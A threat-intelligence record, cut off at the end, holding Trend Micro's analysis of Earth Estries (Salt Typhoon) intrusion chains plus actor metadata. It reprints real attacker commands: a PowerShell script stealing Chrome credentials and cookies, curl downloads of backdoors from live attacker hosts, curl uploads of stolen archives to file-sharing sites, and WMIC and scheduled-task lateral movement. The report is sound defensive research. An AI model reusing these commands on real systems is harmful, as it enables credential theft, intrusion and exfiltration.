{
	"id": "f497e882-5193-444f-9559-107f40ecf464",
	"created_at": "2026-04-06T00:08:03.423656Z",
	"updated_at": "2026-04-10T13:12:10.777052Z",
	"deleted_at": null,
	"sha1_hash": "3fc2dc15d67583665a9daf7cc36f246b4864d052",
	"title": "Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 721050,
	"plain_text": "Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber\r\nOperations\r\nBy: Ted Lee, Leon M Chang, Lenart Bermejo Nov 08, 2024 Read time: 14 min (3823 words)\r\nPublished: 2024-11-08 · Archived: 2026-04-05 18:41:40 UTC\r\nAPT \u0026 Targeted Attacks\r\nDiscover how Earth Estries employs a diverse set of tactics, techniques, and tools, including malware such as\r\nZingdoor and Snappybee, for its campaigns.\r\n \r\nSummary\r\nEarth Estries employs two distinct attack chains in their campaigns that have some common characteristics,\r\nsuch as the exploitation of vulnerabilities in systems like Microsoft Exchange servers and network adapter\r\nmanagement tools.\r\nThe first infection chain uses PsExec and tools such as Trillclient, Hemigate, and Crowdoor delivered via\r\nCAB files, while the second chain employs malware like Zingdoor and SnappyBee, delivered through\r\ncURL downloads.\r\nEarth Estries maintains persistence by continuously updating its tools and employs backdoors for lateral\r\nmovement and credential theft.\r\nData collection and exfiltration are performed using Trillclient, while tools like cURL are used for sending\r\ninformation to anonymized file-sharing services, employing proxies to hide backdoor traffic.\r\nIntroduction\r\nIn early 2023, we published a blog entry on campaigns targeting governments and the tech industry from Earth\r\nEstries (aka Salt Typhoon), a high-level threat actor that has been active since at least 2020. In this report, we\r\nanalyze two distinct attack chains by the group that demonstrate the varied tactics, techniques, and tools that they\r\nuse to compromise targeted systems.\r\nThere are some commonalities between the two attack chains, like the abuse of vulnerable attack surfaces such as\r\nMicrosoft Exchange servers and network adapter management tools. However, there are also significant\r\ndifferences. 
The first chain employs PsExec and WMI command-line (WMIC) for lateral movement, using tools\r\nsuch as Cobalt Strike, Trillclient, Hemigate, and Crowdoor, which are delivered via CAB file packages. The\r\nsecond chain showcases a different approach, using malware such as Zingdoor, Cobalt Strike, and SnappyBee, as\r\nwell as utility tools like PortScan and NinjaCopy, which are delivered via curl downloads.\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 1 of 19\n\nBoth attack chains exhibit persistence by continually updating the installed copies of their tools,\r\nallowing for prolonged campaigns and the ability to stay within compromised networks.\r\nThe first infection chain\r\nIn the first attack scenario, Earth Estries uses an installation of QConvergeConsole, a web-based management tool\r\nfor configuring and managing QLogic Fibre Channel Adapters, as one of its entry methods, along with various\r\nCobalt Strike installations with Crowdoor backdoors — delivered via CAB file packages — to maintain control.\r\nPSExec is heavily used in the earlier stages of the attacks, while the backdoors themselves are also used for lateral\r\nmovement.\r\nEarth Estries continues to employ Trillclient for user credential theft from browser caches to extend its presence\r\nwithin the network. 
The threat actor has also exhibited intimate knowledge of the target's environment and\r\nmethodology, since they used wget to specifically download documents from the target's internal web-based\r\ndocument management system.\r\nInitial access\r\nOur telemetry suggests that Earth Estries gains initial access to their target’s system by exploiting vulnerabilities\r\nin outside-facing services or remote management utilities.\r\nThe group has been observed to take advantage of either vulnerable or misconfigured QConvergeConsole\r\ninstallations in one of its target’s servers to gain access to their system. The installed remote application\r\nagent (c:\\program files\\qlogic corporation\\nqagent\\netqlremote.exe) can perform network discovery and install\r\nCobalt Strike on a target machine.\r\nCommands\r\nC:\\Windows\\system32\\cmd.exe /C net group \"domain admins\" /domain\r\nC:\\Windows\\system32\\cmd.exe /C copy C:\\users\\public\\music\\go4.cab \\\\\r\n{HostName}\\c$\\programdata\\microsoft\\drm\r\nC:\\Windows\\system32\\cmd.exe /C expand -f:* \\\\{HostName}\\c$\\programdata\\microsoft\\drm\\go4.cab \\\\\r\n{HostName}\\c$\\programdata\\microsoft\\drm\r\nC:\\Windows\\system32\\cmd.exe /C c:\\users\\public\\music\\PsExec.exe -accepteula \\\\172.16.xx.xx\r\n\"c:\\ProgramData\\Microsoft\\DRM\\g2.bat\"\r\nIn another instance, they made use of a vulnerability in Apache Tomcat6 bundled with QConvergeConsole\r\n(c:\\program files (x86)\\qlogic corporation\\qconvergeconsole\\tomcat-x64\\apache-tomcat-6.0.35\\bin\\tomcat6.exe)\r\nto perform lateral movement activities and operation of later-stage tools:\r\nCommands\r\nC:\\Windows\\system32\\cmd.exe /C wmic /node:172.16.xx.xx process call create \"cmd.exe /c\r\nc:\\ProgramData\\Microsoft\\DRM\\182.bat\"\r\nC:\\Windows\\system32\\cmd.exe /C C:\\Users\\Public\\Music\\rar.exe a -m5 
C:\\Users\\Public\\Music\\pdf0412.rar\r\nC:\\Users\\Public\\Music\\temp\\*.pdf\r\nBackdoor\r\nCobalt Strike is used as the first-stage backdoor to perform lateral movement and deploy the second-stage\r\nbackdoor. In their previous operation, HemiGate was used as the second-stage backdoor to maintain access to\r\ncompromised machines. However, Earth Estries used a new backdoor, Crowdoor, in this attack.\r\nCrowdoor\r\nThe new backdoor variant, Crowdoor, has been observed to interact with the Cobalt Strike installation, in keeping\r\nwith Earth Estries’ tools, tactics, and procedures (TTPs) of cleaning up and reinstalling tools. Both instances of\r\nCrowdoor and the reinstalled Cobalt Strike were brought in as CAB files by preceding instances.\r\nFigure 1. The first attack chain used by Earth Estries\r\nThe infection chain of the new Crowdoor variant is shown in Figure 2.\r\nFigure 2. Infection chain for the Crowdoor malware\r\nCrowdoor will perform different actions based on the corresponding argument. In Table 1, we summarize the\r\nbehaviors exhibited by the new Crowdoor variant based on the arguments used. Overall, the behaviors are similar\r\nto the ones seen in the older variant, with the difference being the injected process (msiexec.exe) and Command\r\nIDs (shown in Table 2).\r\nArguments Action\r\nNo argument Persistence is set through the registry Run key or a service and the backdoor is restarted.\r\n0 Persistence is set through the registry Run key or a service and the backdoor is restarted.\r\n1 The backdoor is restarted by injecting into 'msiexec.exe'.\r\n2 The backdoor main function is called.\r\nTable 1. 
List of arguments and their corresponding actions\r\nOld Crowdoor variant New Crowdoor variant Functions\r\n0x2347135 0x11736212 Initial connection to C2\r\n0x2347136 0x11736213 Collect ComputerName, Username, OS version and hostnet or IP information\r\n0x2347137 0x11736214 Remote shell\r\n0x234713B 0x11736218 Delete malware files, persistence and exit\r\n0x2347140 0x1173621D File related operation\r\n0x2347141 0x1173621E Open/ReadFile\r\n0x2347142 0x1173621F Open/WriteFile\r\n0x2347144 0x11736221 Collect drive information\r\n0x2347145 0x11736222 Search file\r\n0x2347148 0x11736225 CreateDirectory\r\n0x2347149 0x11736226 Rename file or directory\r\n0x234714A 0x11736227 Delete file or directory\r\n0x234714A 0x11736228 Communication with C\u0026C server\r\nTable 2. Comparison between old and new Crowdoor variants\r\nPackage 1 Package 2 Package 3 Package 4\r\nWinStore.exe (Host) K7Sysmon.exe (Host) HxTsk.exe (Host) MsMsRng.exe (Host)\r\nSqlite3.dll K7Sysmn1.dll d3d8.dll sqlite3.dll\r\ndatastate.dll K7Sysmn2.dll HxTsk (encrypted) msimg32.dll\r\ndatast.dll K7Sysmn3.dll   datastate.dll\r\nWinStore (encrypted) K7Sysmon.dll (encrypted)   MsMsRng (encrypted)\r\nTable 3. Crowdoor packages\r\nLateral Movement\r\nEarth Estries uses PSExec to laterally install its backdoors and tools, notably by copying the CAB files containing\r\nthe backdoors or tools, and a batch file to perform the installation, maintain persistence, and execute the tools.\r\nTypically, PSExec is used to copy the CAB file containing the malware that will be laterally installed. However, in\r\nsome instances, WMIC may be used in its place to achieve similar results. A set of batch files will then be copied\r\nand executed to perform the extraction, installation, and execution of the malware. 
Large scale collection may also\r\nbe executed using batch files.\r\nIn later stages of the attack, the backdoors may be used directly to perform lateral movement. CAB files are still\r\nused as containers for the tools to be installed, and batch files are still incorporated in the extraction, installation\r\nand execution of said tools. This will sometimes include the creation of persistence mechanisms for the batch file\r\nto act as an indirect persistence mechanism for the actual backdoors.\r\nDiscovery, collection and exfiltration\r\nTrillClient’s user credential discovery\r\nEarth Estries will collect user credentials that can be used to further its objectives. The threat actor employs the\r\nTrillClient information stealer for this routine, primarily collecting user credentials from browser user profiles.\r\nTrillClient launches a PowerShell script that will collect user profiles to be saved at a specific location:\r\nforeach($win_user_path in $users_path){\r\necho D | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Roaming\\Microsoft\\Protect\\\"\r\n\\\"$copy_dest_path\\$win_user_path\\Protect\\\" /E /C /H;\r\nattrib -a -s -r -h \\\"$copy_dest_path\\$win_user_path\\*\\\" /S /D;\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Local State\\\"\r\n\\\"$copy_dest_path\\$win_user_path\\Local State\\\" /C;\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User\r\nData\\Default\\Network\\Cookies\\\" \\\"$copy_dest_path\\$win_user_path\\Default\\Network\\Cookies\\\" /C;\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\\\"\r\n\\\"$copy_dest_path\\$win_user_path\\Default\\Login Data\\\" /C;\r\n$profile_path = Get-ChildItem -Name 
\\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User\r\nData\\\\\\\" -Include *Profile* -ErrorAction SilentlyContinue;\r\nforeach($chrome_user_path in $profile_path){\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User\r\nData\\$chrome_user_path\\Network\\Cookies\\\"\r\n\\\"$copy_dest_path\\$win_user_path\\$chrome_user_path\\Network\\Cookies\\\" /C;\r\necho F | xcopy \\\"C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User\r\nData\\$chrome_user_path\\Login Data\\\" \\\"$copy_dest_path\\$win_user_path\\$chrome_user_path\\Login Data\\\"\r\n/C;\r\n   }\r\n}\r\nData will be collected from the following folders:\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local State\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\\u003cPROFILE\u003e\\Login Data\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\\u003cPROFILE\u003e\\Network\\Cookies\r\n%APPDATA%\\Microsoft\\Protect\\*\r\nThe collected data will be temporarily copied to \u003c%TEMP%\\browser_temp_data\u003cRANDOM\u003e\u003e, archived using\r\nthe tar command, and encrypted with an XOR algorithm.\r\ntar -cvf \\\"$copy_dest_path\\tar\\\" $copy_dest_path;\r\n$e_a = [System.IO.File]::ReadAllBytes(\\\"$copy_dest_path\\tar\\\");Remove-Item -Path $copy_dest_path -Recurse;\r\n$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 - ($e_i % 199)));$e_i += 1;}\r\n$random_filename = \\\"300775736611547784207972935122149919289871693\\\";\r\n$out_put_file = $out_put_path + \\\"\\\\\\\" + $random_filename;\r\necho $out_put_file;\r\n[System.IO.File]::WriteAllBytes($out_put_file, $e_a);\r\nThe collected data will then be sent to the threat actor’s Gmail account over Simple Mail Transfer Protocol\r\n(SMTP).\r\nCollection of sensitive documents\r\nEarth Estries utilizes RAR for collecting information of interest. 
In this attack scenario, they utilize wget to\r\ndownload target documents from an internal web-based document management platform to a collection folder\r\nbefore archiving them.\r\nIn this instance, a batch file containing commands to download PDF files to the collection directory is\r\nexecuted, containing hardcoded document names:\r\nc:\\users\\public\\music\\temp\\wget.exe -c \"hxxp://172.16.xx.xx/{document path}/{Hardcoded\r\nFilename}.pdf\" -P c:\\users\\public\\music\\temp\r\nAfterwards, the collected PDFs are archived:\r\nC:\\Windows\\system32\\cmd.exe /C C:\\Users\\Public\\Music\\rar.exe a -m5\r\nC:\\Users\\Public\\Music\\pdf0412.rar C:\\Users\\Public\\Music\\temp\\*.pdf\r\nCollection via backdoor\r\nEarth Estries uses both Crowdoor and Cobalt Strike installations for collection routines by archiving information\r\nof interest from both local and remote locations. Some examples of collection commands performed are as\r\nfollows:\r\nExample command Functions\r\nrar.exe  a -m5 \u003cinstall path\u003e\\322.rar \\\\\u003cremote machine\u003e\\c$\\\u003cremote path\u003e\r\nCollect information gathered by an older generation of infection from a remote machine\r\nrar.exe  a -m5 \u003cinstall path\u003e\\his231.rar \"C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History\"\r\nCollect browser history files, which are of interest to the attackers to be able to compromise more credentials\r\nrar.exe  a \u003cinstall path\u003e\\0311.rar C:\\users\\\u003cuser name\u003e\\Desktop\\* C:\\users\\\u003cuser name\u003e\\Downloads\\* C:\\users\\\u003cuser name\u003e\\Documents\\* -r -y -ta\u003ccutoff date\u003e\r\nCollect more recent files and/or documents interacted with by a local user\r\nTable 4. 
Collection commands\r\nTelemetry suggests that the archives were exfiltrated through the same methods by which the collection commands were executed:\r\neither through the command-and-control (C\u0026C) channels of their backdoors, or through the same initial access\r\nmethod used to control these tools.\r\nThe second infection chain\r\nAn overview of the second Earth Estries attack flow is shown in Figure 3:\r\nFigure 3. Overall flow used for the second attack routine\r\nIn this attack routine, initial access is gained via exploitation of the Microsoft Exchange server to implant a web\r\nshell that allows the delivery of the Cobalt Strike beacon. Meanwhile, lateral movement is performed by the initial\r\nbackdoor, with additional backdoors such as Zingdoor and Snappybee (Deed RAT) being installed on other\r\nmachines within the network. Delivery of these additional backdoors and tools is done either via a C\u0026C server or\r\nby using cURL to download them from attacker-controlled servers. These backdoor installations are also\r\nperiodically replaced and updated. The collection of documents of interest is done via RAR and they are exfiltrated\r\nusing cURL, with the data being sent to anonymized file sharing services.\r\nInitial access\r\nWhile tracking Earth Estries’ recent activities, we found that the group exploits the Microsoft Exchange server and\r\ninstalls the web shell ChinaChopper, through which Earth Estries can deploy Cobalt Strike into other Active\r\nDirectory (AD) servers or individual endpoints and set up the scheduled task and system service to maintain\r\npersistence in the victim’s environment.\r\nThe command sequence from the web shell is as follows:\r\nFigure 4. 
Webshell commands on access\r\nLateral movement, persistence and control\r\nWe have identified four major tools that Earth Estries uses to take control of the target machines: Cobalt Strike,\r\nZingdoor, and Snappybee.\r\nZingdoor is an HTTP backdoor written in Golang that serves as one of the recurring backdoors deployed by Earth\r\nEstries. This is primarily loaded via DLL sideloading using Windows Defender’s MsSecEs.exe.\r\nSnappybee (Deed RAT), a modular backdoor that is said to be the successor to ShadowPad, was previously\r\nrevealed by Positive Technologies. Like Zingdoor, the primary execution method of Snappybee is through DLL\r\nsideloading.\r\nEarth Estries also employs Cobalt Strike in various stages of attacks. While some Cobalt Strike deployments\r\nsimilarly use DLL sideloading, others were deployed using alternate loading methods to enhance persistence and\r\ndefense evasion. Many of the Cobalt Strike installations were configured to use DNS tunnelling to communicate\r\nwith their C\u0026C servers.\r\nIn one of the attacks we observed, Zingdoor was used as a first-stage backdoor. In the later stages of the attack\r\nroutine, we were able to see successive deployments of the other backdoors through preceding installations:\r\nZingdoor to Snappybee and then to Cobalt Strike (however, this is not always the order of deployment). There\r\nwere also instances where preceding installations were cleaned up by the succeeding ones, as in the case of\r\nCobalt Strike removing Snappybee shortly after it was deployed.\r\nFigure 5. Deploying Zingdoor, Snappybee, and Cobalt Strike\r\nThe most common persistence mechanism used by Earth Estries is done via scheduled tasks. 
These are achieved\r\nin several ways, including the use of WMIC, allowing the remote creation of scheduled tasks:\r\nwmic /node:\u003cIP\u003e /user:\u003cdomain\u003e\\\u003cuser\u003e /password:***** process call create \"schtasks /run /tn\r\nmicrosoft\\sihost\"\r\nThe routine also uses cURL to download additional components to remote machines.\r\nTool Download cURL command\r\nSnappybee payload curl -o c:\\windows\\ime\\imejp\\VXTR hxxp://96[.]44[.]160[.]181/VXTR.txt\r\nZingdoor curl -k -o C:\\programdata\\UNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx\r\nPortscan curl -k -o C:\\programdata\\portscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docx\r\nTable 5. Downloading tools via cURL commands\r\nNetwork Discovery via PortScan\r\nNetwork discovery and mapping are done by the backdoors directly via command line execution. Occasionally,\r\nPortscan would also be employed for this purpose. The first set of commands downloads PortScan and then scans the\r\nnetwork for the specified open ports (80, 443, 445, and 3389):\r\ncmd.exe /c \"curl -k -o C:\\programdata\\portscan.exe hxxp://mail.ocac.org.pk/Portscan.docx\"\r\ncmd.exe /c \"C:\\programdata\\portscan.exe 172.xx.xx.0/24 445,3389,80,443\"\r\ncmd.exe /c \"C:\\programdata\\portscan.exe 172.xx.xx.0/24 445,3389,80,443 \u003e1.log\"\r\ncmd.exe /c \"cmd /c \"C:\\programdata\\portscan.exe 172.xx.xx.0/24 445,3389,80,443\" \u003e\u003e1.log\"\r\nLateral installation of Zingdoor\r\nAfter the port scanning step, a set of Zingdoor malware is downloaded. 
This is then copied to a separate machine\r\nthat was discovered during the port scanning.\r\ncmd.exe /c \"curl -k -o C:\\programdata\\SetupPlatform.exe hxxp://mail.ocac.org.pk/SetupPlatform.docx\"\r\ncmd.exe /c \"curl -k -o C:\\programdata\\UNBCL.dll hxxp://mail.ocac.org.pk/UNBCL.docx\"\r\ncmd.exe /c \"copy C:\\programdata\\SetupPlatform.exe \\\\172.xx.xx.xx\\c$\\ProgramData\\Microsoft\\Windows\"\r\ncmd.exe /c \"copy C:\\programdata\\SetupPlatform.exe \\\\172.xx.xx.xx\\c$\\ProgramData\\Microsoft\\Windows\"\r\nRemote service creation\r\nThrough ChinaChopper, Earth Estries can place commands to remotely create services for persistence and\r\nprivilege escalation.\r\n\"cmd\" /c cd /d \"c:\\Windows\\IME\\IMEJP\\\"\u0026net use \\\\{hostname} {password} /user:{user name}\u0026echo\r\n[S]\u0026cd\u0026echo [E]\r\n\"cmd\" /c cd /d \"c:\\Windows\\IME\\IMEJP\\\"\u0026copy v*.* \\\\{hostname}\\c$\\programdata\\vmware\\\u0026echo\r\n[S]\u0026cd\u0026echo [E]\r\nsc \\\\{hostname} create VGAuthtools type= own start= auto binpath=\r\n\"c:\\windows\\microsoft.net\\Framework\\v4.0.30319\\Installutil.exe C:\\Programdata\\VMware\\vmvssrv.exe\"\r\nFrom the configuration of the created service, the malicious loader vmvssrv.exe (a .NET assembly) is launched\r\nusing Installutil.exe, which is a built-in installation utility in Windows. 
The\r\nvmvssrv.exe loader will then load and launch Cobalt Strike to compromise the target machine.\r\nRemote scheduled task\r\nAgain using ChinaChopper, the threat actor can input commands to remotely create scheduled tasks for\r\npersistence.\r\nschtasks /create /tn VMware\\vmtools /tr \"cmd /c \\\"start C:\\Programdata\\VMware\\vmtools.exe\\\"\" /sc onstart\r\n/ru \"\" /S 10.131.xx.xx /U {user name} /P {password} \u0026echo [S]\u0026cd\u0026echo [E]\r\nThe installed vmtools.exe file, which is deployed via the web shell, is a malicious loader used to load Cobalt Strike.\r\nExecution: alternate loading methods\r\nEarth Estries employs various loading methods for its tools, particularly Cobalt Strike. Aside from DLL\r\nsideloading, other loader components were designed to be used via the following methods.\r\nExecutable loaders\r\nCobalt Strike loaders include straightforward executable loaders such as vmtools.exe, a loading mechanism that will\r\nload an encrypted payload named msvsct.obj. This type of loader uses a single-byte, multi-layer ADD – XOR – SUB\r\nbitwise operation to decrypt its payload.\r\nFigure 6. The vmtools.exe decryption routine\r\nRundll32.exe loaders\r\nA DLL version of the loader can also be deployed to load Cobalt Strike. This involves a scheduled task added via\r\nthe command line for persistence:\r\nC:\\\\Windows\\\\system32\\\\cmd.exe /C sc create VMware binpath= \\\"rundll32.exe\r\nC:\\\\Progra~1\\\\VMware\\\\vmtools.dll,fjdpw03d\\\" start= auto displayname= \\\"VMware\\\"\r\nThis loader uses the Base64 decoding algorithm with a custom alphabet to decrypt its payload.\r\nFigure 7. 
The vmtools.dll using Base64 with custom alphabet\r\nA later version of this loader uses a simplified decryption with single-byte XOR to decrypt its payload.\r\nFigure 8. Snippets showing vmtools.dll (top) and audiodg.dll (bottom)\r\nMsiexec.exe loaders\r\nCobalt Strike can also be loaded via loader components using msiexec.exe:\r\nmsiexec.exe /y C:\\Windows\\PLA\\Performance.dll\r\nThis series of loaders is simpler and uses single-byte XOR for decryption.\r\nFigure 9. Loader using single byte XOR for decryption\r\nThis type of installation also comes with a Windows Service for persistence and execution:\r\nsc create pasrv binpath= \"cmd /c \\\"start msiexec.exe /y C:\\Windows\\PLA\\Performance.dll\\\"\" start= auto\r\ndisplayname= \"Microsoft Performance Alerts Server\"\r\nCredential Dumping\r\nRe-implemented NinjaCopy\r\nNinjaCopy is a hack tool that is well known for its ability to copy protected system files. Using the tool, threat\r\nactors can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing\r\nthe NTFS structures. This allows them to bypass the following protections (note that a Win32 API was not used,\r\nso Windows is not aware that these protections were being ignored):\r\n1. Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or\r\nSYSTEM registry hives.\r\n2. System Access Control List (SACL) flag set on a file that alerts when the file is opened.\r\n3. 
Bypass the Discretionary Access Control Lists (DACLs), such as those that only allow SYSTEM to open\r\na file.\r\nDuring the operation, we noticed that Earth Estries implemented a new variant of NinjaCopy by using an open-source NTFS parser released by Velocidex. With this variant, the attacker successfully extracted the SYSTEM\r\nregistry hives which contain sensitive data from the victim’s environment.\r\nCollection and exfiltration\r\nInformation collection is done via RAR archives which are mostly password-protected. The following are the\r\nRAR commands used by Earth Estries over the course of one of its campaigns:\r\nrar a -m3 -inul -ed -r -s -hp{password} -ta{yyyymmdd} -n*.pdf -n*.ddf -x*\"\\{avoided path}\\\" {Collector\r\nPath}\\out\u003cn\u003e.tmp \\\\{IP}\\“{Target Path}“\r\nMeanwhile, the following are the passwords that they used:\r\ntakehaya\r\nforeverthegod\r\ndh2uiwqji9dash\r\nExfiltration is done using cURL, which sends the stolen documents to anonymized file sharing services:\r\ncurl -F \"file=@c:\\windows\\ime\\out1.tmp\" hxxps://api.anonfiles[.]com/upload\r\ncurl -F \"file=@c:\\windows\\ime\\out1.tmp\" -k hxxps:/file[.]io\r\ncurl -F \"file=@c:\\windows\\ime\\out3.tmp\" hxxps://api.anonfiles[.]com/upload\r\nCommand-and-Control\r\nHiding backdoor traffic via internal proxy server\r\nWe noticed that one of the C\u0026C addresses used for Zingdoor is an internal IP address. After further investigation, we\r\nfound that the internal address refers to the internal proxy server in the victim’s environment. 
We infer that the\r\nthreat actor attempted to use the victim’s proxy server to forward traffic to the actual C\u0026C servers, making the\r\ntraffic from the backdoor more difficult to discover.\r\nAdditional observations\r\nDuring the investigation, we found other backdoors, including an Internet Information Services (IIS) backdoor\r\n(FuxosDoor) and a customized backdoor (Cryptmerlin).\r\nWe are not certain if these backdoors were indeed deployed by Earth Estries. However, the approximate\r\noccurrence time is close, and they were found within the same infected machine. Hence, we still include these\r\nfindings in this report.\r\nFuxosDoor\r\nFuxosDoor is an IIS backdoor which was deployed and run on the compromised Exchange server. Once it receives\r\na request with a specific URL path, /web.config, from the attacker, it will try to extract the encrypted command\r\nfrom the field (ASP.NET_SessionId) in the HTTP header and then execute the received command by using the\r\ncommand prompt (cmd.exe). Afterwards, the results will be encrypted and sent back to the attacker’s server.\r\nFigure 10. Receiving a request via /web.config\r\nFigure 11. Decryption algorithm for the received content\r\nFigure 12. Encryption algorithm for the response\r\nCryptmerlin\r\nAttackers used the DLL sideloading technique on the target machine to launch Cryptmerlin, a customized\r\nbackdoor based on an open-source malware, Merlin Agent, written in Golang. Unlike the original Merlin Agent,\r\nCryptmerlin currently only implements the ExecuteCommand function, which will communicate to the C\u0026C\r\nserver via HTTP/HTTPS request. 
To lower the security warning on the infected machine, Cryptmerlin can also\r\ncommunicate with the C\u0026C server over a proxy server, with the information of the victim’s internal proxy also\r\nembedded in the config.\r\nFilename Description\r\nsvcchost.exe Legitimate file used as main loader\r\nshfolder.dll DLL sideloaded by svcchost.exe; a simple loader that will find and load another DLL file named svcchost.dll\r\nsvcchost.dll Malicious payload, which is the backdoor malware Cryptmerlin\r\nTable 4. Files used for the Cryptmerlin backdoor\r\nConclusion\r\nOur analysis of Earth Estries’ persistent TTPs in prolonged cyber operations reveals a sophisticated and adaptable\r\nthreat actor that employs various tools and backdoors, demonstrating not only technical capabilities, but also a\r\nstrategic approach to maintaining access and control within compromised environments.\r\nIn the first infection chain, Earth Estries exploited vulnerabilities in web-based adapter management tools like\r\nQConvergeConsole, employing tools like Cobalt Strike, Hemigate, and Crowdoor that are delivered via CAB file\r\npackages. Along with PsExec, these backdoors also facilitated lateral movement throughout the network. The\r\nincorporation of Trillclient for credential harvesting from browser caches further illustrates the group’s\r\ncomprehensive tactics aimed at deepening their foothold in the target environment.\r\nIn the second infection chain, Earth Estries capitalized on vulnerable Exchange servers, making use of web shells\r\nsuch as ChinaChopper and additional backdoors such as Zingdoor, SnappyBee, and Cobalt Strike, all of which\r\nhighlight the diversity of Earth Estries’ toolkit. 
The deployment of these tools via C\u0026C channels, alongside the\r\nuse of techniques like DLL sideloading and cURL for downloading components, underscores their ability to adapt\r\nin response to defensive measures.\r\nThroughout their campaigns, Earth Estries has displayed a keen understanding of their target environments by\r\ncontinually identifying exposed layers for re-entry. By using a combination of established tools and custom\r\nbackdoors, they have created a multi-layered attack strategy that is difficult to detect and mitigate.\r\nRecommendations\r\nDefensive efforts should focus on securing external-facing services, especially email servers and web applications,\r\npatching known vulnerabilities, and implementing robust credential management practices. The continued\r\nevolution of new tools and tactics used by groups such as Earth Estries reinforces the necessity for constant\r\nvigilance and for implementing a multilayered defense to protect critical infrastructure from such sophisticated\r\nintrusion sets.\r\nFinally, using technologies such as Trend Vision One™ enables security teams and analysts to view all\r\ncomponents of the organization from a single platform. It allows them to monitor and track tools, behaviors, and\r\npayloads as they attempt to move and execute within the organization’s networks, systems, and infrastructure. At\r\nthe same time, it detects and blocks threats as early in the attack or infection process as possible.\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat\r\nInsights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they\r\nhappen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their\r\nmalicious activities, and the techniques they use. 
By leveraging this intelligence, customers can take proactive\r\nsteps to protect their environments, mitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nBreaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations\r\nTrend Micro Vision One Threat Insights App\r\nThreat Actors: Earth Estries\r\nEmerging Threats: Breaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nTrend Micro Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in\r\nthis blog post with data in their environment.\r\nEarth Estries Malware Detection\r\nmalName:(*HEMIGATE* OR *DRACULOADER* OR *CROWDOOR* OR\r\n*ZINGDOOR* OR *TRILLCLIENT*) AND eventName: MALWARE_DETECTION\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.\r\nIndicators of Compromise\r\nThe indicators of compromise can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html"
	],
	"report_names": [
		"breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html"
	],
	"threat_actors": [
		{
			"id": "f67fb5b3-b0d4-484c-943e-ebf12251eff6",
			"created_at": "2022-10-25T16:07:23.605611Z",
			"updated_at": "2026-04-10T02:00:04.685162Z",
			"deleted_at": null,
			"main_name": "FamousSparrow",
			"aliases": [
				"Earth Estries"
			],
			"source_name": "ETDA:FamousSparrow",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f0eca237-f191-448f-87d1-5d6b3651cbff",
			"created_at": "2024-02-06T02:00:04.140087Z",
			"updated_at": "2026-04-10T02:00:03.577326Z",
			"deleted_at": null,
			"main_name": "GhostEmperor",
			"aliases": [
				"OPERATOR PANDA",
				"FamousSparrow",
				"UNC2286",
				"Salt Typhoon",
				"RedMike"
			],
			"source_name": "MISPGALAXY:GhostEmperor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a09ade2a-6b87-4f9a-b4f8-23cf14f63633",
			"created_at": "2023-11-04T02:00:07.676869Z",
			"updated_at": "2026-04-10T02:00:03.389898Z",
			"deleted_at": null,
			"main_name": "Earth Estries",
			"aliases": [],
			"source_name": "MISPGALAXY:Earth Estries",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff",
			"created_at": "2024-12-28T02:01:54.899899Z",
			"updated_at": "2026-04-10T02:00:04.880446Z",
			"deleted_at": null,
			"main_name": "Salt Typhoon",
			"aliases": [
				"Earth Estries",
				"FamousSparrow",
				"GhostEmperor",
				"Operator Panda",
				"RedMike",
				"Salt Typhoon",
				"UNC2286"
			],
			"source_name": "ETDA:Salt Typhoon",
			"tools": [
				"Agentemis",
				"Backdr-NQ",
				"Cobalt Strike",
				"CobaltStrike",
				"Crowdoor",
				"Cryptmerlin",
				"Deed RAT",
				"Demodex",
				"FamousSparrow",
				"FuxosDoor",
				"GHOSTSPIDER",
				"HemiGate",
				"MASOL RAT",
				"Mimikatz",
